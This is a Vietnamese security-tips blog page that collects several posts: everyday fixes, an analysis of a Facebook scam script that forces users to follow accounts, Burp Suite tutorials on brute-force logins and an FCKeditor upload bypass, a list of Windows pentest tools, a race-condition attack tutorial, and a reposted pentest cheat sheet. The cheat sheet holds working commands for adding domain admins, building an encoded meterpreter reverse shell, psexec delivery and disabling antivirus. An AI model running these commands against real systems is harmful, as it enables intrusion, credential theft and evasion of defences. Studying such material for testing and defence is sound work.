Trang

Khắc phục lỗi Script Error trong Yahoo! Messenger 11

Một lỗi khá phổ biến và không ít phiền toái khi sử dụng Yahoo! Messenger 11.
An error has occurred in the script on this page.
Line : 1
Char : 1
Error : Invalid character
Code : 0
URL : http://mi.adinterax.com/wrapper.js
Do you want to continue running scripts on this page ?
8-29-2011-8-44-08-am_thumb


Để khắc phục lỗi này thật đơn giản: 
Bạn vào Run nhập 2 lệnh này: 
    1. regsvr32 jscript.dll
    2. regsvr32 vbscript.dll
Nhận được thông báo sau là bạn đã thành công, nếu có lỗi bạn xem tiếp phần Khắc phục lỗi khi thực hiện lệnh regsvr32 phía dưới:
8-29-2011-10-41-18-am_thumb

Tip:

  • Cách vào RUN 
1. Cách thứ nhất vào Start –> Run – với Window 7 hoặc Vista bạn nhập trực tiếp vào ô Search programs and files
8-29-2011-11-01-59-am_thumb
2. Cách thứ hai bấm tổ hợp phím Window + R
8-29-2011-11-00-43-am_thumb

  • Khắc phục lỗi khi thực hiện lệnh regsvr32:
“The module “jscript.dll” was loaded but the call to DllRegisterServer failed with error code 0×80004005″
Bạn download file Jscript.dll từ địa chỉ http://www.dll-files.com/dllindex/dll-files.shtml?jscript chép vào thư mục C:\WINNT\System32 hoặc C:\Windows\System32 và thực hiện lại 2 lệnh regsvr32 jscript.dll và regsvr32 vbscript.dll một lần nữa.
  • Xem thêm về cách sử dụng lệnh regsvr32:
http://support.microsoft.com/kb/249873/vi-vn
Vào Control Panel mở biểu tượng Internet Options > chọn thẻ Advanced > đánh chọn kiểm vào Disable Script Debugging (Internet Explorer) > chọn kiểm vào Disable Script Debugging (Other) > nhấn Apply.
8-29-2011-11-30-32-am_thumb
Tiếp tục chọn thẻ Security > chọn tiếp Custom Level
8-29-2011-8-48-13-am_thumb
Khi hộp thoại Security Settings – Internet zone hiện ra thì tìm mục: Script ActiveX controls marked safe for scripting và click chọn Enable rồi nhấn nút OK.
8-29-2011-11-32-04-am_thumb

SamiBoyVN.

Xem Thêm

 

Thực hư chức năng chèn nhạc nền vào trang cá nhân Facebook?

Chào các bạn!

Dạo gần đây có khá nhiều tài khoản Facebook có đăng 1 status hoặc spam comment vào status của các bạn với nội dung đại loại như sau:


01

Những status như này thường đánh vào tâm lý tò mò, "ham của lạ" của các bạn (ai mà không muốn trang cá nhân mình đặc biệt hơn của người khác khi có thêm nhạc nền chứ, đúng không :D).



Đây là hình ảnh kèm theo status như để chứng minh:
998567_509983169081386_1940742347_n

Nhưng đừng vội "nhẹ dạ cả tin" khi thấy những status như này. Chúng ta cùng bắt tay vào phân tích status này nhé :)
  • Giả sử như Facebook có thêm chức năng này thật thì cũng sử dụng player của Facebook, tại sao trong hình "demo" lại là player của Zing Mp3 (trang nghe nhạc trực tuyến tại Việt Nam???).
  • Điểm nghi ngờ thứ hai là trong hình "demo" không có phần Tiêu đề khung (chính là tên của khung, ví dụ như: Thông tin, Album Ảnh, Bạn bè,...). mà chỉ có phần player?
Phân tích liên kết tại Bước 1 trong status, thường thì những status như này thường dẫn bạn tới 1 link có dạng như sau:
http://pastebin.com/raw.php?i=ID
02

Trong đó thì ID là 1 đoạn code ngẫu nhiên khi tạo 1 trang paste mới tại Pastebin.
Pastebin là một ứng dụng web cho phép bất cứ ai cũng có thể lưu trữ văn bản trong một thời gian nhất định. Website này chủ yếu được sử dụng bởi các lập trình viên để lưu trữ những mã nguồn hay thông tin cấu hình, nhưng về cơ bản thì bất cứ ai cũng có thể chia sẻ.
Tiếp tục phân tích đoạn mã được chia sẻ bằng Pastebin:
- Đoạn mã sử dụng ngôn ngữ Javascript.
- Khi làm theo các bước hướng dẫn để có thể sử dụng chức năng "nhạc nền" như status kia nói thì đoạn JS (Javascript) này sẽ hiện 1 hộp thông báo (theo mình để gây thêm sự chú ý hoặc đánh lạc hướng người sử dụng):
alert('XONG! NHẤN ENTER ĐỂ HOÀN TẤT QUÁ TRÌNH UPDATE PLUGIN FACEBOOK. CHÚC CÁC BẠN ONLINE VUI VẺ CẢm ON BẠN ÐÃ SỬ DỤNG CODE CỦA CHÚNG TÔI HTTPS://FACEBOOK.COM');
- Sử dụng tiếp một hàm được gọi là "a" gửi truy vấn bằng ajax tới "/ajax/follow/follow_profile.php?__a=1" để tự động theo dõi những ID của những User được chỉ định sẵn:
function a(abone){
    var http4 = new XMLHttpRequest();
     
    var url4 = "/ajax/follow/follow_profile.php?__a=1";
     
    var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
    http4.open("POST", url4, true);
     
    //Send the proper header information along with the request
    http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http4.setRequestHeader("Content-length", params4.length);
    http4.setRequestHeader("Connection", "close");
     
    http4.onreadystatechange = function() {//Call a function when the state changes.
    if(http4.readyState == 4 && http4.status == 200) {
       
      http4.close; // Close the connection
     
    }
    }
    
    http4.send(params4);
}

Danh sách những ID mà bạn sẽ bị "ép theo dõi":
03

- Làm sao để biết bạn đã bị ép theo dõi ai? Rất đơn giản, lấy số ID trong danh sách kia và truy cập:
https://www.facebook.com/ID
Ví dụ: Hàm đầu tiên gọi tới ID này:
a("100003217938743");
Thì bạn kiểm tra bằng cách vào liên kết sau:
 https://www.facebook.com/100003217938743
Facebook sẽ tự trỏ ID tới Username của him ý :))
04
https://www.facebook.com/liushishi.10.3.1987 (Đang được theo dõi bởi 130.784 người)
Giờ thì mình đã hiểu tại sao sub nhiều thế? :(
OK, tương tự với các ID khác, các bạn tự truy ra nhé :D

* Làm sao để kiểm tra? Rất đơn giản. Các bạn có thể tự kiểm tra như sau:
  • Hủy theo dõi user đó.
  • Làm theo các bước hướng dẫn để "chèn nhạc nền".
  • F5 lại trang cá nhân của user đó và xem nút Theo dõi có trở thành "Đang theo dõi" hay không? Nếu có thì bạn đã hiểu những gì mình vừa nói :).
* Còn vài hàm nữa thực hiện add bạn bè vào group, theo dõi list sub, đăng tin nhắn lên page nhưng mình không thấy được gọi tới.

Tóm lại là cả đoạn mã JS này không có một chỗ nào thêm chức năng "nhạc nền" vào trang cá nhân cho bạn cả mà chỉ bắt bạn theo dõi user linh tinh :). Hãy nhanh chóng tìm những ID mà bạn đã bị "ép theo dõi" và hủy theo dõi nhé ;). Đừng quên chia sẻ bài viết này cho bạn bè cùng biết (share lên Facebook càng tốt ^^).

* Link đoạn Javascript mà mình phân tích trong bài này: http://pastebin.com/raw.php?i=hex65K0s
Dành cho những bạn muốn phân tích thêm, chứ đừng lấy mà chạy thử nha!
Nguồn : Junookyo Blog's 

Xem Thêm

 

Cách gửi email mã hóa qua Gmail trên Chrome

Phần mở rộng (extension) miễn phí của Google Chrome cho phép gửi đi email được mã hóa từ Gmail tới các dịch vụ email khác. Bạn cần gửi đi một email chứa thông tin nhạy cảm? Mọi email gửi đi theo cách thông thường đều có nguy cơ bị chặn hoặc bị “hack” trước khi đến tay người nhận.

Để đề phòng điều này, bạn có thể sử dụng một phần mở rộng (extension) miễn phí cho Google Chrome có tên SafeGmail. SafeGmail cho phép bạn gửi đi các email đã mã hóa.

[Hình: gmail1.jpg]

Email sẽ được mã hóa và giải mã ngay trong trình duyệt, vì thế chỉ bạn và người nhận xem được nội dung thư. Để đảm bảo tính bí mật, email vẫn ở tình trạng mã hóa trong cả hộp thư đi của người gửi và hộp thư đến của người nhận. Email cũng sẽ tự động hết hạn sau một khoảng thời gian ngẫu nhiên.

Bạn có thể dùng SafeGmail để gửi email từ hộp thư Gmail của mình tới người nhận dùng bất kỳ dịch vụ email nào, bao gồm Gmail, Yahoo! Mail…

Để cài đặt phần mở rộng này, truy cập trang SafeGmail extension, nhấn vào nút “Add to Chrome”.

[Hình: gmail2.jpg]

Khi hộp thoại “Confirm New Extension” xuất hiện, nhấn nút “Add”.

[Hình: gmail3.jpg]
Sau khi việc cài đặt hoàn tất, một hộp tin nhắn sẽ xuất hiện. Khởi động lại Google Chrome và mở lại trang Gmail.

[Hình: gmail4.jpg]

Bạn sẽ thấy SafeGmail đã thêm lựa chọn “Encrypt?” trong màn hình soạn thảo của Gmail. Sau khi viết xong email và nhập địa chỉ người nhận cũng như tiêu đề email, chọn hộp đánh dấu bên cạnh “Encrypt?”, sẽ xuất hiện hai hộp “Question”“Answer”. Nhập một câu hỏi và câu trả lời xác nhận mà chỉ bạn và người nhận được biết. Nhấn “Send + Encrypt”.

[Hình: gmail5.jpg]

Email được mã hóa khi chuyển tới người nhận sẽ có hình như bức ảnh dưới đây, giữa hai dòng đường kẻ đứt nét là một dòng ký tự bao gồm cả chữ cái và chữ số. Copy đoạn ký tự này trước khi nhấn vào link “Here” ở dòng “Click Here to access the mail content.”

[Hình: gmail6.jpg]

Trả lời câu hỏi xác nhận và nhấn “Submit” để truy cập màn hình cho phép giải mã email.

[Hình: gmail7.jpg]

Màn hình Mail Decryption hiện lên. Paste (dán) đoạn ký tự vừa copy vào hộp và nhấn “Show My Mail”.

[Hình: gmail8.jpg]

Nội dung tin nhắn sau khi giải mã sẽ hiển thị ở cửa sổ trình duyệt.

SafeGmail cũng cho phép bạn nhập các ký tự ngôn ngữ đặc biệt trong email cần mã hóa.

Xem Thêm

 

Gửi tệp tin .exe ngay trong Gmail

Gmail và Yahoo Mail hay bất cứ dịch vụ mail nào khác đều không hỗ trợ đính kèm các tệp tin có định dạng .exe (file chạy) và một số định dạng khác. Tuy nhiên, có rất nhiều cách để bạn gửi file chạy qua email, trong đó phổ biến nhất là nén file đó thành định dạng RAR, ZIP hay 7Z rồi mới tiến hành đính kèm.

Một thủ thuật khá đơn giản có thể giúp bạn thực hiện điều này ngay trong Gmail bằng cách sử dụng dịch vụ lưu trữ trực tuyến Google Drive.

[Hình: image001.png]

Gmail cho phép người dùng upload và chia sẻ các tệp tin thông qua Google Drive. Do đó, để khai thác thủ thuật này, trước tiên bạn cần phải kích hoạt tính năng New compose trong hộp thư của mình (để kích hoạt tính năng này, sau khi nhấn nút Compose để soạn thư mới, bạn nhìn lên phía trên bên phải nhãn Labels sẽ thấy dòng chữ Try out the new compose experience, hãy nhấn vào liên kết đó rồi nhấn tiếp nút Go it khi có thông báo hiện ra).

Kể từ giờ, mỗi khi bạn soạn thư mới thì sẽ có một cửa sổ New Message riêng được hiển thị tại góc dưới bên phải trang Gmail giống như cửa sổ chat. Trên thanh công cụ phía dưới cửa sổ soạn thư, bạn hãy rê chuột vào biểu tượng Attach files, khi đó biểu tượng xuất hiện ngay bên phải chính là biểu tượng của Google Drive (insert files using Drive). Một khi sử dụng tùy chọn này, bạn có thể upload một tệp tin với bất kỳ kiểu định dạng nào bao gồm cả file chạy (.exe).
[Hình: image003.png]
[Hình: image005.png]

Trong cửa sổ Insert files using Google Drive, bạn có thể upload một tệp tin từ máy tính bằng cách nhấn nút Select files from your computer hoặc sử dụng các tệp tin trực tiếp trong mục My Drive chứa dữ liệu đã có sẵn trong Google Drive, tiếp theo nhấn nút Insert để đính kèm nó, sau cùng nhấn send để gửi thư và bạn sẽ phải chọn Send & share để thừa nhận việc chia sẻ từ Google Drive.

[Hình: image008.jpg]

Bây giờ người nhận mở hộp thư mà bạn gửi tới, họ sẽ click vào file đã gửi để chuyển qua trang chứa tệp tin trong Goog Drive của bạn rồi nhấn nút Download để tải tệp tin về máy.

Tóm lại, với phương thức này cũng chẳng khác gì việc bạn share dữ liệu cho một người nào đó trong Google Drive thông qua email của họ, nhưng khi đang làm việc trong hộp thư Gmail thì sử dụng cách làm này sẽ mang lại thuận tiện đối với bạn.

Xem Thêm

 

Burp suite – Intercept Proxy [P 2]

Rất vui được gặp lại các bạn trong phần 2 của Burp Suite, công cụ Intercept Proxy cực kỳ hữu ích. Trong phần này mình sẽ đưa ra một số ví dụ cụ thể nhất khi áp dụng Brup Suite trong kỹ thuật hacking. Đây là những kinh nghiệm mình đúc rút được và có học hỏi từ internet nữa. Bài viết bao gồm 2 ví dụ (thực ra có nhiều lắm nhưng trong lúc thảng thốt mình ko nhớ rõ trang nào bị để demo nữa :D ).
XSS
XSS thông thường thì chúng ta không nói nhiều trong bài viết này nữa vì đưa script vào URL, thêm các thao tác sửa đổi, encode để chạy… Tuy nhiên, đã bao giờ bạn dùng acunetix nhận được thông báo như này:
1
Nói thật, trước khi biết sử dụng các công cụ chỉnh sửa http header, mình gặp cái này cũng há hốc mồm ko biết làm sao (đã POST lại phải URL encode), nhưng hiện tại thì rất đơn giản chúng ta chỉ cần sử dụng trình duyệt request đến url bị lỗi và bật brup suite ra hứng. Gói tin request thông thường
2
Thay thể luôn bằng request này (POST đã thay cho GET) một cách dễ dàng và forward gói tin đi
3
Xong,
4
Ngoài ví dụ này (POST) thì ngay cả khi gói tin GET nhưng nhiều khi chạy thẳng qua trình duyệt cũng ko được. Lúc đó Brup Suite là một lựa chọn tối ưu
FCKeditor 2.6.8 ASP upload Bypass
Điểm yếu này mới được Mostafa Azizi và Soroush Dalili công bố trong năm nay (many thanks), việc exploit lợi dụng điểm yếu khi fckeditor trên website victim sử dụng ASP làm connector để upload file. Điều thú vị là 99% tấn công thực hiện thành công nhờ Brup Suite. Chi tiết điểm yếu này các bạn có thể Google, mình sẽ đi luôn vào việc exploit. Do nó bao gồm nhiều thao tác nên để tiện theo dõi, mình làm video demo sau

Xem Thêm

 

Burp suite – Intercept Proxy [P 1]

Có lẽ tới thời điểm hiện tại burpsuite là công cụ đã rất phổ biến và rất nhiều người thành thạo sử dụng công cụ này. Do đó bài viết của mình chỉ giới thiệu sơ lược tính năng và thực nghiệm áp dụng công cụ này trong hoạt động pentest của mình.
Công cụ có cả bản free và pro (thương mại). Bản pro có tình năng cao cấp hơn là chức năng scan. Tất nhiên bản pro sẽ mất phí nhưng các bạn hoàn toàn có thể kiếm bản đã được cr*ck trên mạng không khó khăn mấy. Mình sẽ đi vào một số tính năng chính của bản free và chức năng scan của Pro
Thiết lập để sử dụng burpsuite
Trước tiên vì burpsuite được viết trên nền java do đó cần có Java Runtime Enviroment để chạy, lưu ý, các bạn nên tải bản jre 6 vì bản 7 mới nhất thì burpsuite lại không tương thích (chuối)
Thiết lập trên trình duyệt để các traffic từ máy sẽ đi qua burpsuite
Intercept Traffic
Thử nghiệm với một page bất kỳ ta có thể thấy traffic sẽ bị chặn tại burp suite trước, ta có thể chọn forward để gói tin đi tiếp hoặc drop để bỏ gói tin, dĩ nhiên thông tin trong traffic chúng ta hoàn toàn có thể thay đổi được trước khi forward
Repeater
Đây là một thành phần rất hữu ích của Burp Suite, nếu bạn cần thử nghiệm thay đổi header nhiều lần thì repeater là những gì mà bạn cần. Từ header chặn được, các bạn click chuột phải và chọn send to repeater, sau đó chuyển sang tab repeater sẽ thấy header mình cần thao tác. Công dụng của repeater là bạn có thể chỉnh sửa header thoải mái rồi chọn Go sau đó đợi header respone để biết server sẽ làm gì với header của mình. Nó đặc biệt hữu dụng vì có thể chỉnh sửa, Go nhiều lần mà không mất công vào lại browser, điền thông tin rồi submit rồi lại chỉnh trong proxy (quá tốn thời gian).
Encode/Decode
Chức năng mã hóa, giải mã của Brup Suite rất tốt, nó hỗ trợ rất nhiều loại mã và giải mã
Brute Force
Brup Suite có thể kiêm chức năng HTTP Authentication Testing với tính năng Intruder. Ví dụ, từ trang login quản trị, mình nhập thông tin bất kỳ là username=admistrator&password=123456. Trong proxy của Brup Suite sẽ thấy
Click chuột phải chọn send to intruder
Trong tab positions,chọn attack type là cluster bomb, bên dưới ta có thấy header với các giá trị được đánh dấu bởi ký tự $, tuy nhiên chúng ta chỉ cần quan tâm đến username và password, do đó trước hết hãy clear $ để bỏ hết đi và chỉ add $ bao quan giá trị của 2 biến mà ta quan tâm (ở đây là administrator và 123456) như hình vẽ.
OK như vậy trong tab payload bên cạnh sẽ có 2 payload set (tương ứng với với biến username và password). Tiến hành nhập giá trị cho biến 1 (username), có thể nhập bằng tay từng giá trị hoặc load file username mà bạn có
Tiến hành nhập giá trị cho biến 2 (password) tương tự biến 1
Từ menu intruder chọn attack
Kết quả
Status là 302 (Found) có nghĩa là username và password không đúng (found chứ không phải OK nhé, các bạn cần để ý cái này). Một số website thì code http khi đăng nhập sai là 302, 401 (access deny). Còn trong trường hợp nhập đúng sẽ là 200 (OK) hoặc 202 (Accepted). Do đó mã 302 thì phải cố gắng tiếp thôi :D
Scanner
Chức năng Scanner chỉ có trong phiên bản Pro, chất lượng scan của Brup Suite là khá tốt, có thể tham khảo thêm tại http://www.sectoolmarket.com/ để có cái nhìn tổng quan chất lượng các công cụ scan
Đặc điểm của brup suite là scan thụ động, chúng ta view site đến đâu nó sẽ scan đến đó, một vài kết quả scan được
Chúng ta cũng có thể cho brup suite scan chủ động một url nào đó qua proxy, chọn actively scan this item
Trên đây là các tính năng chính của Brup Suite, bài viết tới mình sẽ đi sâu vào ứng dụng của Brup Suite trong các trường hợp cụ thể.

Xem Thêm

 

Bảo vệ tối ưu cho tài khoản Facebook

Để bảo mật quyền riêng tư của người dùng trên Facebook, người dùng có thể tham khảo một số cách làm dưới đây để bảo đảm an toàn cho trang mạng xã hội của mình trong năm mới. Bạn có thể theo dõi các lần đăng nhập vào trang Facebook của mình qua email, tin nhắn hoặc sử dụng kết nối SSL để bảo vệ tài khoản.

Dưới đây là các cách bảo vệ tài khoản Facebook của chúng tôi:

Thay đổi mật khẩu định kỳ

[Hình: facebook11.jpg]

Cách đơn giản nhất là người dùng thường xuyên thay đổi định kỳ mật khẩu tài khoản của mình nhưng đừng đặt quá đơn giản sẽ dễ dàng bị hacker đánh cắp. Một mật khẩu đủ mạnh phải bao gồm: chữ, số, ký tự đặc biệt, chữ viết hoa và có độ dài hơn 8 ký tự. Ví dụ: TeSt@123@tSeT

Để thay đổi mật khẩu bạn làm như sau: "Account settings > General > Password". Sau khi đổi lại mật khẩu mới, chọn Save changes.

Thay đổi câu trả lời bí mật

Người dùng không nên chọn những câu hỏi bí mật như: Bạn sinh ra ở đâu? Tên một người bạn thân?... Những thông tin này có thể bị các hacker dễ dàng tìm ra khi truy cập vào Facebook của bạn.

Vì vậy, nên chọn những câu hỏi bí mật có tính chất ngẫu nhiên, mang những thông tin mà khó có thể đoán được. Ví dụ: Bạn thích chơi game gì nhất? Câu trả lời: Football Manager hoặc Call of Duty.

Để thay đổi câu trả lời bí mật, bạn làm như sau: "Account settings > Security > Security Question", sau đó nhập mật khẩu để lưu thay đổi, cuối cùng chọn Save Changes.

Đăng nhập tài khoản Facebook bằng cách xác nhận SMS

[Hình: facebook33.jpg]

Có thể lựa chọn một cách đăng nhập an toàn hơn đó là xác nhận qua SMS. Cứ mỗi lần đăng nhập Facebook trên một máy tính lạ, Facebook sẽ gửi một tin nhắn trong đó có mã xác nhận về số điện thoại mà người dùng đã đăng ký để nhận trước đó. Điều này chỉ xảy ra một lần mỗi khi bạn dùng máy tính hoặc điện thoại lạ để đăng nhập vào tài khoản Facebook của mình.

Để bật chức năng này, làm như sau: "Account settings > Security > Login Approvals". Sau đó, người dùng cung cấp số điện thoại nhận tin nhắn theo chỉ dẫn.

Gửi email thông báo mỗi lần đăng nhập

[Hình: facebook44.jpg]

Bạn chọn "Account settings > Security > Login notifications", tích vào mục Email rồi kết thúc bằng phím Save Changes.

Sử dụng kết nối SSL (Secure Sockets Layer) cho Facebook

[Hình: facebook3.jpg]

Ngoài 4 cách do trên, bạn cũng có thể sử dụng kết nối SSL để bảo vệ tài khoản Facebook. Kết nối này giúp nâng cáo cơ chế bảo mật cho website của bạn.

Để sử dụng kết nối SSL chọn "Account settings > Security > Secure Browsing", tiếp tục tích vào mục Browse Facebook on a secure connection (https) when possible, kết thúc bằng phím Save Changes.

Xem Thêm

 

[Tool Security] Windows Tools For Penetration Testing

Most penetration testers are using either a Mac or a Linux-based platform in order to perform their penetration testing activities.However it is always a good practice to have and a Windows virtual machine with some tools ready to be used for the engagement.The reason for this is that although Windows cannot be used as a main platform for penetration testing some of the utilities and tools can still help us to extract information from our windows targets.So in this post we will see some of the tools that we can use in our windows system.
HashCheck Shell Extension
The HashCheck Shell Extension makes it easy for anyone to calculate and verify checksums and hashes from Windows Explorer. In addition to integrating file checksumming functionality into Windows, HashCheck can also create and verify SFV files (and other forms of checksum files, such as .md5 files).
Netcat
Netcat is often referred to as a “Swiss-army knife for TCP/IP”. Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.
Metasploit Framework
The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
RealVNC Viewer

Remote access software for desktop and mobile platforms.
GetIf
SNMP tool that allows you to collect information about SNMP devices.
Cain & Abel
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.
Wireshark
Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development.
PuTTY
PuTTY is an SSH and telnet client for the Windows platform.
Pass The Hash Toolkit
The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes.
Cachedump
Recovering Windows Password Cache Entries.
Fport
Identify unknown open ports and their associated applications.
Nbtscan
This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares.
Burp Suite
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Winfo
Winfo uses null sessions to remotely try to retrieve lists of and information about user accounts, workstation/interdomain/server trust accounts, shares (also hidden), sessions, logged in users, and password/lockout policy, from Windows NT/2000/XP. It also identifies the built-in Administrator and Guest accounts, even if their names have been changed.
ClearLogs
ClearLogs clears the event log (Security, System or Application) that you specify. You run it from the Command Prompt, and it can also clear logs on a remote computer.
SQLDict
SQLdict is a dictionary attack tool for SQL Server.
PMDump
PMDump is a tool that lets you dump the memory contents of a process to a file without stopping the process.
GrabItAll
GrabItAll performs traffic redirection by sending spoofed ARP replies. It can redirect traffic from one computer to the attackers computer, or redirect traffic between two other computers through the attackers computer. In the last case you need to enable IP Forwarding which can be done with GrabItAll too.
DumpUsers
DumpUsers is able to dump account names and information even though RestrictAnonymous has been set to 1.
BrowseList
BrowseList retrieves the browse list. The output list contains computer names, and the roles they play in the network. For example you can see which are PDC, BDC, stand-alone servers and workstations. You can also see the system comments (which can be very interesting reading).
Remoxec
Remoxec executes a program using RPC (Task Scheduler) or DCOM (Windows Management Instrumentation).
WMICracker
Brute-force tool for Windows Management Instrumentation (WMI).
Venom
Venom is a tool to run dictionary password attacks against Windows accounts by using the Windows Management Instrumentation (WMI) service. This can be useful in those cases where the server service has been disabled.
SMBAT
The SMB Auditing Tool is a password auditing tool for the Windows-and the SMB-platform. It makes it possible to exploit the timeout architecture bug in Windows 2000/XP, making it extremly fast to guess passwords on these platforms.
RPCScan
RPCScan v2.03 is a Windows based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins.
LSASecretsDump
LSASecretsDump is a small console application that extract the LSA secrets from the Registry, decrypt them, and dump them into the console window.
SQLPing
SQL Ping is a nice little command line enumerator that specifically looks for SQL servers and requires no authentication whatsoever.
OAT
The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers.
Pwdump7
Extract password hashes from local user accounts.
PsTools
The PsTools package provides a set of command line utilities that allow you to manage local and remote systems.
Incognito
Incognito is a tool for manipulating windows access tokens and is intended for use by penetration testers, security consultants and system administrators.
DumpSec
DumpSec is a security auditing program for Microsoft Windows® NT/XP/200x. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, registry, printers and shares in a concise, readable format, so that holes in system security are readily apparent. DumpSec also dumps user, group and replication information.
X-Deep32
X-Deep/32 is an X Window Server for Windows NT/2000/9X/ME/XP that can be used to connect to host systems running UNIX, LINUX, IBM AIX etc.
LC5
Windows password cracker.
Ophcrack
Ophcrack is a free Windows password cracker based on rainbow tables.
SiVuS
SiVus is the first publicly available vulnerability scanner for VoIP networks that use the SIP protocol. It provides powerful features to assess the security and robustness of VoIP implementations.

Nguồn Blog
http://pentestlab.wordpress.com/

Xem Thêm

 

Cheat Sheet For Pentest By AverageSecurityGuy

Mount Shares


# Mount Windows Share with Null Session
net use x: \\server\share "" /u:

# Mount NFS share on Linux
mount -t nfs server:/share /mnt/point

# Mount Windows Share on Linux
mount -t cifs //server/share -o username=,password= /mnt/point

Add Administrative Accounts


# WINDOWS: Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# WINDOWS: Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# LINUX: Add a new user to linux and put them in the wheel group
useradd -G wheel username

# LINUX: Set the new user's password
passwd username

# LINUX: If the shell is non-interactive set the password using chpasswd
echo "username:newpass"|chpasswd

stdapi_sys_process_execute: Operation failed: 1314


# If you get this error while trying to drop to as shell
# in meterpreter, try the code below. This is a known bug
# in meterpreter.
execute -f cmd.exe -c -i -H

Metasploit: Use custom executable with psexec


# Generate an executable
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe

# Setup multi/handler
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4445
LPORT => 4445
[*] Started reverse handler on 192.168.0.1:4445
[*] Starting the payload handler...

# In another msfconsole setup psexec
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /path/to/custom.exe
EXE::Custom => /path/to/custom.exe
msf exploit(psexec) > exploit

# If everything works then you should see a meterpreter 
# session open in multi/handler

Disable Antivirus


# Disable Symantec Endpoint Protection
c:\program files\symantec\symantec endpoint protection\smc -stop

Use Ettercap to Sniff Traffic


ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap

Cracking WPA/WPA2 PSK


# With John the Ripper
john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap

# With Hashcat
./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap

Create an IP List with Nmap


nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt

Crack Passwords with John and Korelogic Rules


for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} 
-w:<wordlist> <password_file> ; done 

Nguồn Blog
http://averagesecurityguy.info/cheat-sheet/ 

Xem Thêm

 

[Tutorial] Race condition attack trên ứng dụng web


Race condition là một vấn đề không mới, mình cũng đã biết từ lâu nhưng toàn trên linux. Để hiểu race condition trên web ta xem 1 ví dụ như sau :
Người A có 10000 $ trong tài khoản, anh ta thực hiện rút 5 lần cùng lúc từ internet banking (bỏ qua 1 số token bảo vệ nhé), mỗi lần 10$, nhưng trong tài khoản chỉ trừ 10$ thôi (lẽ ra phải trừ 50). Vậy lỗi xảy ra ở đâu ?
Xem xét đoạn code sau của ngân hàng trong việc trừ tiền :

Khi tiến trình 1 đang thực hiện câu lệnh $tongtien = $tongtien – $sotien thì một tiến trình 2 của người A đang đòi rút chèn ngang, lúc này hệ thống sẽ tạm dừng tiến trình 1 đang xử lý để quay sang xử lý tiến trình 2 :

Lúc này khi bắt đầu xử lý tiến trình 2, tổng tiền chưa được cập nhật bởi tiến trình 1 đã tạm dừng. Do đó số tiền trong tk lúc này vẫn là 10000 và sau khi thực hiện xong cả 2 tiến trình thì tổng tiền vẫn là 9990 mặc dù đã rút 2 lần. Như vậy race condition đã xảy ra khi mà 1 tiến trình chèn ngang tiến trình khác trong lúc các tham số vẫn chưa kịp cập nhật.
Ở đây mình tạo 1 đoạn code lấy tiền với khá nhiều việc, làm cho thời gian xử lý nó lên tới tận 1,2s và cố thử rút 8 lần mà chỉ bị trừ 10$
B1, kiểm tra tài khoản ban đầu và xem access log , lúc này ta đang có 10000:

B2, Xử dụng 1 đoạn python để cùng 1 lúc gửi 8 request, mỗi request đều rút 10$ trong cùng 1 thời gian và xem kết quả trả về :
Như vậy sau 10 request, tổng tiền chỉ bị trừ 10$ trong khi đã rút đến 8 lần.
B3. Kiểm tra log file ta thấy 8 request này tới cùng lúc. Và bởi vì server phải đòi hỏi đến 1 giây để xử lý 1 giao dịch, do đó 8 request này đã làm xuất hiện race condition và bị chèn ngang lẫn nhau.


Nguồn Blog
http://antoanthongtin.wordpress.com

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương